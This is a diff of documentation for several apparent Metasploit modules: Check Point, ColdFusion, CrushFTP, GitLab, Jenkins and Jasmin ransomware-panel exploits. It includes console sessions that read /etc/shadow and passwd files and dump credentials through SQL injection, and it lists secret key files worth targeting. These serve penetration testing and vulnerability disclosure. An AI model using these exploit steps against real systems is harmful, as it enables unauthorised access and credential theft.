+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 key='HKLM\SECURITY\Policy\PolEKList' action=WRITE sd=01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000 security_information=4
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019 (from file)
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=WRITE file=/tmp/remote_registry_sd_backup.yml
+[*] Running module against 192.168.101.124
+
+[*] 192.168.101.124:445 - Getting security descriptor info from file /tmp/remote_registry_sd_backup.yml
+  key: HKLM\SECURITY\Policy\PolEKList
+  security information: 4
+  security descriptor: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
@@ -4,7 +4,7 @@ Provided AWS credentials, this module will call the authenticated API of Amazon
 instances accessible to the account. Once enumerated as SSM-enabled, the instances can be controlled using out-of-band
 WebSocket sessions provided by the AWS API (nominally, privileged out of the box). This module provides not only the API
 enumeration identifying EC2 instances accessible via SSM with given credentials, but enables session initiation for all
-identified targets (without requiring target-level credentials) using the CreateSession mixin option. The module also
+identified targets (without requiring target-level credentials) using the CreateSession datastore option. The module also
 provides an EC2 ID filter and a limiting throttle to prevent session stampedes or expensive messes.

 ## Verification Steps
@@ -26,7 +26,7 @@ Security bulletin from Squid: https://github.com/squid-cache/squid/security/advi

 ### REQUEST_COUNT

-REQUEST_COUNT is both the the number of HTTP requests which are sent to the server in
+REQUEST_COUNT is both the number of HTTP requests which are sent to the server in
 order to perform the actual Denial of Service (i.e. accepted requests by the server),
 and the number of requests that are sent to confirm that the Squid host is actually
 dead.
@@ -44,7 +44,7 @@ usually preferable, but may be less stealthy.
 An example of brute forcing usernames, in the hope of finding one with pre-auth not required:

 ```msf
-msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
+msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local
 [*] Running module against 192.168.1.1

 $krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
@@ -71,4 +71,4 @@ $krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353

 [*] Query returned 1 result.
 [*] Auxiliary module execution completed
-```
+```
@@ -0,0 +1,109 @@
+## Vulnerable Application
+This module leverages an unauthenticated arbitrary root file read vulnerability for
+Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
+are enabled on affected devices, traversal payloads can be used to read any files on
+the local file system. Password hashes read from disk may be cracked, potentially
+resulting in administrator-level access to the target device. This vulnerability is
+tracked as CVE-2024-24919.
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may
+not be read accurately.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1:
+42e25f45ab6b1694a97f76ca363d58040802e6d6).
+1. Install the ISO within a virtual machine.
+1. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
+1. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
+1. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades. These instructions focus on Mobile Access:
+   1. Open the Gateway Properties:
+      1. Navigate to Gateways & Servers in the left-hand menu.
+      1. Select the gateway you want to configure.
+      1. Right-click on the gateway and select Edit.
+   1. Enable Mobile Access:
+      1. In the General Properties tab, under Network Security, check the box for Mobile Access.
+      1. Click on Mobile Access in the left-hand menu of the gateway properties window to access the Mobile Access settings.
+   1. Configure Mobile Access:
+      1. Set up the authentication methods under Authentication (e.g., LDAP, RADIUS, etc.).
+      1. Configure the Portal Settings, specifying the URL for the Mobile Access Portal.
+      1. Under Applications, define which applications and resources will be accessible via the Mobile Access portal.
+      1. Click OK to close the properties window.
+1. Publish and push the configuration changes to the device.
+   1. In SmartConsole, after completing your configuration, click on the Publish button at the top right corner of the
+      SmartConsole window. This will save your changes to the management database.
+   1. After publishing the changes, click on the Install Policy button located at the top of the SmartConsole window.
+   1. In the Install Policy window, select the policy package you want to install. This is typically your main security policy package.
+   1. Choose the gateways on which you want to install the policy. Make sure to select the gateway that you configured
+      for Mobile Access and/or IPSec VPN.
+   1. Click Install to begin the installation process. Once this process completes the gateway should then be vulnerable to this module.
+
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display the target file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### Check Point Security Gateway Linux
+```
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 
+
+Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       443              yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false            yes       Store the target file as loot
+   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
+   TARGETURI   /                yes       The URI path to Check Point Security Gateway
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
+RHOSTS => 192.168.181.128
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
+[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
+[*] Running module against 192.168.181.128
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file read successful!
+[+] File read succeeded! 
+admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
+monitor:*:19872:0:99999:8:::
+root:*:19872:0:99999:7:::
+cp_routeevt:*:19872:0:99999:7:::
+nobody:*:19872:0:99999:7:::
+postfix:*:19872:0:99999:7:::
+rpm:!!:19872:0:99999:7:::
+shutdown:*:19872:0:99999:7:::
+pcap:!!:19872:0:99999:7:::
+halt:*:19872:0:99999:7:::
+cp_postgres:*:19872:0:99999:7:::
+cp_extensions:*:19872:0:99999:7:::
+cpep_user:*:19872:0:99999:7:::
+vcsa:!!:19872:0:99999:7:::
+_nonlocl:*:19872:0:99999:7:::
+sshd:*:19872:0:99999:7:::
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+
+### Setup
+
+#TODO: Find out how to setup a vulnerable target and put those details here.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use coldfusion_pms_servlet_file_read`
+1. Set the `RHOST` and datastore option
+1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
+1. Run the module
+1. Receive the contents of the `FILE_PATH` file 
+
+## Scenarios
+### ColdFusion Version 2023.0.0.330468 running on Linux
+
+```
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[*] Attempting to retrieve UUID ...
+[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /etc/passwd
+[+] File content:
+n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
+hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
+pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+whoopsie:x:117:124::/nonexistent:/bin/false
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,81 @@
+## Vulnerable Application
+This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and
+< 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without
+authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The
+primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote
+code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
+More information can be found in the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis).
+
+## Options
+
+### INJECTINTO
+The unauthenticated API function to use for template injection (default: zip).
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: users/MainUsers/groups.XML). This can be a full path, a relative path, or a network share path (if 
+firewalls permit). Files containing binary data may not be read accurately. Though file paths for Windows targets can contain `:` 
+characters, like `C:\Windows\win.ini`, this will result in payloads not being fully redacted from CrushFTP logs.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of CrushFTP [here](https://github.com/the-emmons/CVE-2023-43177/releases/download/crushftp_software/CrushFTP10.zip) (SHA256: adc3619937ebb57b3a95c50f78fda5c388d072c0d34a317b9ed64a31127a6d3f).
+2. Configure `CRUSH_DIR` in `crushftp_init.sh` to point to the correct install directory.
+3. Execute `java -jar CrushFTP.jar` to show a local client GUI interface that can be used to set up an admin account.
+4. Execute `sudo crushftp_init.sh start` to launch the software on Linux or Mac. If on Windows, run `CrushFTP.exe` as an administrator.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/crushftp_fileread_cve_2024_4040`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### CrushFTP on Windows, Linux, or Mac
+```
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 
+
+Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):
+
+   Name        Current Setting             Required  Description
+   ----        ---------------             --------  -----------
+   INJECTINTO  zip                         yes       The CrushFTP API function to inject into (Accepted: zip, exists)
+   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                                     loit.html
+   RPORT       8080                        yes       The target port (TCP)
+   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false                       yes       Store the target file as loot
+   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (i
+                                                     f firewalls permit). Files containing binary data may not be read accurately
+   TARGETURI   /                           yes       The URI path to CrushFTP
+   VHOST                                   no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
+[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Server-side template injection successful!
+[*] Fetching anonymous session cookie...
+[*] Using template injection to read file: users/MainUsers/groups.XML
+[+] File read succeeded! 
+<?xml version="1.0" encoding="UTF-8"?>
+<groups type="properties"></groups>
+
+
+
+[*] Auxiliary module execution completed
+```
@@ -7,7 +7,7 @@ in the cluster, indices, and pull data from those indices.
 ### Docker

 Docker install is quite simple, however it won't come with any data making the results rather boring.
-However, we can use the the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
+However, we can use the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
 repo to help auto populate our data.

 ```
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Information disclosure affecting all versions of GitLab
+before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1
+by sending a GET request to the project URI and appending "-/tags"
+
+### Docker installation instructions can be found here:
+
+https://docs.gitlab.com/ee/install/docker.html
+
+Once installed, create a project. Once the project is
+created, add a new tag by expanding the Code menu item
+on the left, then selecting Tags. Then click on the 
+New Tag button in the top right corner.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `set RHOSTS [IP]`
+1. Do: `run`
+1. You should receive output with user names and email addresses assocaited with project tags
+
+## Options
+
+### TARGETPROJECT
+
+This will gather information for ALL PUBLICLY ACCESSIBLE PROJECTS. IF you know the specific project you would
+like to target, you would need to set that here.
+
+## Scenarios
+### Scrape all Workspaces/Projects
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[+] [2024.02.09-11:18:23] Scraping ALL projects...
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__010524.xml
+[+] [2024.02.09-11:18:23] name: john doe
+[+] [2024.02.09-11:18:23] e-mail: johndoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: Workspace1/Project2
+[+] [2024.02.09-11:18:23] Output saved to /root/.msf4/loot/20240209111823_default_127.0.0.1_gitlab.RSS.info__822263.xml
+[+] [2024.02.09-11:18:23] name: janedoe
+[+] [2024.02.09-11:18:23] e-mail: janedoe@example.com
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws2/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj1
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] [2024.02.09-11:18:23] Check RSS tags feed for: ws3/proj2
+[-] [2024.02.09-11:18:23] No tags or authors found
+[*] Auxiliary module execution completed
+```
+### Specify Project
+```
+msf6 > use auxiliary/gather/gitlab_tags_rss_info_disclosure 
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set RHOSTS 127.0.0.1     
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > set TARGETPROJECT Workspace1/Project1
+TARGETPROJECT => Workspace1/Project1
+msf6 auxiliary(gather/gitlab_tags_rss_info_disclosure) > run
+[*] Running module against 127.0.0.1
+
+[*] [2024.02.09-11:44:43] Check RSS tags feed for: Workspace1/Project1
+[+] [2024.02.09-11:44:43] Output saved to /root/.msf4/loot/20240209114443_default_127.0.0.1_gitlab.RSS.info__390983.xml
+[+] [2024.02.09-11:44:43] name: janedoe
+[+] [2024.02.09-11:44:43] e-mail: janedoe@example.com
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+within the download functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get the content of a file if it exists.
+
+## Options
+
+### FILE
+
+File to retrieve. `etc/passwd` is the default, but
+`var/www/html/database/db_conection.php` contains the
+database credentials.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_dir_traversal
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+rtkit:x:118:124:RealtimeKit,,,:/proc:/usr/sbin/nologin
+kernoops:x:119:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+cups-pk-helper:x:120:125:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+systemd-oom:x:121:128:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+whoopsie:x:122:129::/nonexistent:/bin/false
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+avahi-autoipd:x:124:131:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+avahi:x:125:132:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+nm-openvpn:x:126:133:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:127:135::/var/lib/saned:/usr/sbin/nologin
+colord:x:129:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+sssd:x:130:137:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+pulse:x:131:138:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+speech-dispatcher:x:132:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+gnome-initial-setup:x:133:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:134:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:136:143:MySQL Server,,,:/nonexistent:/bin/false
+
+[+] Saved file to: /root/.msf4/loot/20240415125844_default_127.0.0.1_jasmin.webpanel._670418.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set FILE var/www/html/data
+base/db_conection.php
+FILE => var/www/html/database/db_conection.php
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] <?php
+$dbcon=mysqli_connect("localhost","jasminadmin","123456");
+
+mysqli_select_db($dbcon,"jasmin_db");
+
+?>
+
+[+] Saved file to: /root/.msf4/loot/20240415125905_default_127.0.0.1_jasmin.webpanel._177654.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) >
+```
+
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+within the login functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+Retrieving the victim's data may take a long amount of time. It is much quicker to
+get the logins, then just login to the site.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should contents from the SQL Database.
+
+## Options
+
+### VICTIMS
+
+Pull data from the Victim's table. Defaults to `false`
+
+### VICTIMLIMIT
+
+Number of rows from the victim table to pull. Defaults to `nil` which pulls all rows.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_sqli
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true
+victims => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > run
+
+[*] Dumping login table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
+[*] {SQLi} Time-based injection: expecting output of length 15
+[+] Dumped table contents:
+Logins
+======
+
+ admin     creds
+ -----     -----
+ siddhant  123456
+
+[*] Dumping victim table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims)
+[*] {SQLi} Time-based injection: expecting output of length 428
+[+] Dumped table contents:
+Victims
+=======
+
+ machine_name     computer_user  ip              systemid                  password
+ ------------     -------------  --              --------                  --------
+ Bollywood        Salman Khan    47.247.223.177  df545f454f5d4f5d4af5      M9M99EvNpZVOWpy9Q8sZLHEP
+ DESKTOP-37Q74QH  cyberstair     47.247.223.177  96457DF79A87C7C0008A7BE7  xAS4NinH/HQKNJwsNtTWN5yD
+ FiFa             Leone Messi    47.247.223.177  cfhsfkdjkfvdd454s5g4      JDNAaz6e3oyM8cN+AGFdMl/5
+ Indian Cricket   Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4545fs      3tIHrYJqqTSBpw4lgMMck1GD
+ White House      Donald Trump   47.247.223.177  fgighefesdgvrd5g45rd4h    RJtCd9QqiCfBaSU0zQf84dvd
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+This module utilizes the Jenkins cli protocol to run the `help` command.
+The cli is accessible with read-only permissions by default, which are
+all thats required.
+
+Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to
+replace any `@<filename>` with the contents of a file. We are then able to retrieve
+the error message to read up to the first two lines of a file.
+
+Exploitation by hand can be done with the cli, see markdown documents for additional
+instructions.
+
+There are a few exploitation oddities:
+1. The injection point for the `help` command requires 2 input arguments.
+When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument.
+If a file only contains one line, it will throw an error: `ERROR: You must authenticate to access this Jenkins.`
+However, we can pad out the content by supplying a first argument.
+2. There is a strange timing requirement where the `download` (or first) request must get
+to the server first, but the `upload` (or second) request must be very close behind it.
+From testing against the docker image, it was found values between `.01` and `1.9` were
+viable. Due to the round trip time of the first request and response happening before
+request 2 would be received, it is necessary to use threading to ensure the requests
+happen within rapid succession.
+
+Files of value:
+
+ * /var/jenkins_home/secret.key
+ * /var/jenkins_home/secrets/master.key
